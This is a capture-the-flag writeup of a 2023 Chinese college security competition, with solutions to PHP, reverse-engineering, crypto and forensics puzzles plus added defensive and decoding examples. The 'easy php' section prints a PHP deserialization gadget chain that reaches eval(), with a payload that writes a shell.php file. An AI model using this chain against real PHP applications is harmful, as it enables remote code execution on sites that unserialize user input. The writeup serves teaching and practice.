• 2023 Zhejiang Province College Student Information Security Competition, preliminary round: partial writeup


    Web

    easy php

    BBB::__debuginfo() -> CCC::__toString() -> AAA::__call()

    
    class AAA{
        public $cmd;
    
        public function __call($name, $arguments){
            eval($this->cmd);
            return "done";
        }
    }
    
    class BBB{
        public $param1;
        public function __construct($param1){
            $this->param1 = $param1;
        }
        public function __debuginfo(){
            return [
                'debugInfo' => 'param1' . $this->param1 
            ];
        }
    }
    
    class CCC{
        public $func;
    
        public function __toString(){
            var_dump("aaa");
            $this->func->aaa();
        }
    }
    
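    // Entry point: user-controlled input reaches unserialize(), and var_dump()
    // on the resulting object is what invokes BBB::__debuginfo()
    if(isset($_GET['aaa'])){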
        $aaa = $_GET['aaa'];
        var_dump(unserialize($aaa));
    }
    
    
    // Payload generator: BBB wraps a CCC whose func is an AAA carrying the command string
    $C = new CCC();
    $B = new BBB($C);
    $A = new AAA();
    $A ->cmd= "file_put_contents('shell.php','');";
    $C->func = $A; 
    
    echo serialize($B);
    # O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:58:"file_put_contents('shell.php','');";}}}
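
A defensive counterpart to the chain above, as an added example that is not part of the original writeup: a small Python parser for PHP's serialize() format that lists every class a payload names, so an input filter or a log review can flag object payloads before they reach unserialize(). `php_classes` is a hypothetical helper name and `SAMPLE` is constructed with a harmless command string.

```python
# Added example: enumerate classes named in a PHP serialize() string.
SAMPLE = (b'O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";'
          b'O:3:"AAA":1:{s:3:"cmd";s:7:"echo 1;";}}}')  # constructed, benign cmd


def php_classes(data: bytes) -> list:
    """Return class names of every O: object; ValueError on anything unparsable."""
    found, pos = [], 0

    def until(ch: bytes) -> bytes:          # read up to (and consume) ch
        nonlocal pos
        end = data.index(ch, pos)
        tok, pos = data[pos:end], end + 1
        return tok

    def expect(lit: bytes) -> None:
        nonlocal pos
        if data[pos:pos + len(lit)] != lit:
            raise ValueError(f"malformed input at byte {pos}")
        pos += len(lit)

    def quoted() -> bytes:                  # <byte length>:"<raw bytes>"
        nonlocal pos
        n = int(until(b":"))
        expect(b'"')
        s, pos = data[pos:pos + n], pos + n
        expect(b'"')
        return s

    def value() -> None:
        nonlocal pos
        tag, pos = data[pos:pos + 1], pos + 1
        if tag == b"N":                     # null is just "N;"
            return expect(b";")
        expect(b":")
        if tag in (b"i", b"b", b"d"):
            until(b";")
        elif tag == b"s":
            quoted()
            expect(b";")
        elif tag in (b"a", b"O"):
            if tag == b"O":                 # O:<len>:"Class":<count>:{...}
                found.append(quoted().decode())
                expect(b":")
            count = int(until(b":"))
            expect(b"{")
            for _ in range(2 * count):      # alternating keys and values
                value()
            expect(b"}")
        else:                               # C:, E:, r:, R: ... treat as hostile
            raise ValueError(f"unsupported type {tag!r}")
    value()
    return found
```

In PHP itself, calling `unserialize($aaa, ['allowed_classes' => false])` keeps these classes from being instantiated, which breaks the chain at its first step.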
    

    RE

    pyccc

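    uncompyle6.exe fails to decompile it back to .py source.

    The following file is what could be recovered (shown as an image in the original post).

    Analysis shows that it first initializes an array and then XORs each element with its index.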

    c=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
    # print(len(c))
    tem = ""
    for i in range(len(c)):
        tem += chr((c[i]) ^ i)
    print(tem,end="")
    

    flag{1t_is_very_hap4y!!}

    ezapk

    Decompile the APK.

    Decrypt the AES.

    Crypto

    Little Mathematician (小小数学家)

    Use re to match the numbers and the operator on each line, then evaluate the expression.

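    import re

    # Raw strings so that \d and \W reach the regex engine unchanged
    num = re.compile(r"\d+")    # runs of digits (the operands)
    symble = re.compile(r"\W")  # any non-word character (the operator)
    
    with open("./flag.txt", "r") as f:
        lines = f.readlines()
    
        for line in lines:
            nums = num.findall(line)
            symbles = symble.findall(line)
            # eval() only ever sees digits, one non-word character, digits
            print(chr(int(eval(nums[0] + symbles[0] + nums[1]))), end="")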
    

    DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

    Basic Number Theory (基础数论)

    Use Sage to solve p^2 + q^2 = n.

    import hashlib
    
    c = 173178061442550241596295506150572803829268102881297542445649200353047297914764783385643705889370567071577408829104128703765633248277722687055281420899564198724968491216409225857070531370724352556864154450614891750313803499101686782558259953244119778256806332589612663957000269869144555485216828399422391672121
    x,y = (two_squares(c))
    print(x,y)
    print(hashlib.md5(str(x+y).encode()).hexdigest())
    
    

    8ef20a4873c5ec776dd34bf5f0eb56cf

    MISC

    number game

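    The back end is just a single JS file, and the roll code in it is clearly the key part (the challenge says the flag is obtained through roll).

    Copy this piece of JS out, paste it into the console with the condition of the if changed to true, then click roll again: the flag pops up.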

    Ez_misc

    Checking the challenge file against the JPG file header shows that every pair of hex digits is reversed, so all we need to do is flip them back.

    Reverse it with a script:

    '''
    A.bin
    21.7.22
    '''
    # Read the challenge file and write it back with its bytes in reverse order
    with open('C:/Users/Abin/Desktop/yuanshen', 'rb') as src:
        data = src.read()
    with open('C:/Users/Abin/Desktop/y.zip', 'wb') as dst:
        dst.write(data[::-1])
    

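    The result of this reversal is still not correct (because the hexadecimal is in reverse order); the string as a whole also has to be reversed. I used a tool for that step.

    Load the data into 010 Editor to produce the image.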
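
The two reversal steps above can be done in one pass. The following is an added example, not the original author's script: it goes beyond the single case in the writeup by trying byte reversal, per-byte nibble swap, and full hex-string reversal, and keeps whichever result starts with a known file signature. The function names and the sample bytes are constructed for illustration.

```python
# Added example: undo byte-order / nibble-order scrambling by checking magic bytes.
MAGICS = {"jpg": b"\xff\xd8\xff", "zip": b"PK\x03\x04", "png": b"\x89PNG"}


def swap_nibbles(data: bytes) -> bytes:
    """Swap the two hex digits of every byte: 0xFD -> 0xDF."""
    return bytes(((b << 4) & 0xF0) | (b >> 4) for b in data)


TRANSFORMS = {
    "identity": lambda d: d,
    "reverse bytes": lambda d: d[::-1],
    "swap nibbles": swap_nibbles,
    # reversing the whole hex string = reverse bytes + swap nibbles
    "reverse hex string": lambda d: bytes.fromhex(d.hex()[::-1]),
}


def recover(blob: bytes):
    """Return (transform name, file type, restored bytes), or None if nothing fits."""
    for name, fn in TRANSFORMS.items():
        out = fn(blob)
        for ftype, magic in MAGICS.items():
            if out.startswith(magic):
                return name, ftype, out
    return None


# Constructed sample: a minimal JPEG-like byte string, scrambled by reversing
# its entire hex representation.
ORIGINAL = bytes.fromhex("ffd8ffe000104a46494600010100ffd9")
SCRAMBLED = bytes.fromhex(ORIGINAL.hex()[::-1])

if __name__ == "__main__":
    name, ftype, restored = recover(SCRAMBLED)
    print(name, ftype, restored.hex())
```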

    Use steghide to extract the hidden data, which gives flag.txt:

    DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
    DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
    DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
    DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
    DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
    DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
    DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT
    DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
    DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH
    DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
    DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
    DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
    DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
    DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH
    DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
    DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
    DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
    DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
    DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH
    DASHDASHDOTDOTDOT DASHDOTDOT
    

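    Following the pattern of Morse code, convert each DASH to - and each DOT to ., which gives the following code:

    -.... -.... -.... -.-. -.... .---- -.... --... --... -... -.... ....- -.... -.... ...-- ....- -.... -.... ...-- -.... ...-- ...-- ...--
    ..... -.... .---- -.... ..--- ...-- ...-- ...-- ....- ...-- ..--- -.... .---- ...-- ..... -.... ..--- ...-- ...-- -.... ..--- -....
    ..--- ...-- ---.. ...-- ..... ...-- ..... -.... .---- ...-- ....- ...-- -.... ...-- ....- -.... ....- ...-- --... -.... ..--- -....
    ..--- ...-- ....- -.... ..... -.... ...-- --... -..

    Decoding it gives the flag: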
    flag{df4f635ab342a5b3bb855a464d7bb4ec}
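
The decoding steps for flag.txt, as an added example that is not part of the original writeup (the author used a tool): DASH/DOT words are turned into Morse, the Morse symbols into hex digits, and the hex digits into ASCII. The function names are hypothetical; `SAMPLE` is the first two lines of the flag.txt content shown above.

```python
# Added example: decode the DASH/DOT word encoding from flag.txt to ASCII.
import re

MORSE = {
    ".----": "1", "..---": "2", "...--": "3", "....-": "4", ".....": "5",
    "-....": "6", "--...": "7", "---..": "8", "----.": "9", "-----": "0",
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
}  # digits plus A-F are enough, because the Morse text spells hex digits


def words_to_morse(text: str) -> list:
    """'DASHDOTDOTDOTDOT DASHDOTDASHDOT' -> ['-....', '-.-.']"""
    out = []
    for word in text.split():
        if not re.fullmatch(r"(?:DASH|DOT)+", word):
            raise ValueError(f"not a DASH/DOT word: {word!r}")
        out.append(word.replace("DASH", "-").replace("DOT", "."))
    return out


def decode(text: str) -> str:
    """DASH/DOT words -> Morse -> hex digits -> ASCII."""
    hex_digits = "".join(MORSE[m] for m in words_to_morse(text))
    return bytes.fromhex(hex_digits).decode("ascii")


# First two lines of the flag.txt content shown above.
SAMPLE = """
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
"""

if __name__ == "__main__":
    print(decode(SAMPLE))
```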

  • Original article: https://blog.csdn.net/qq_35782055/article/details/134225477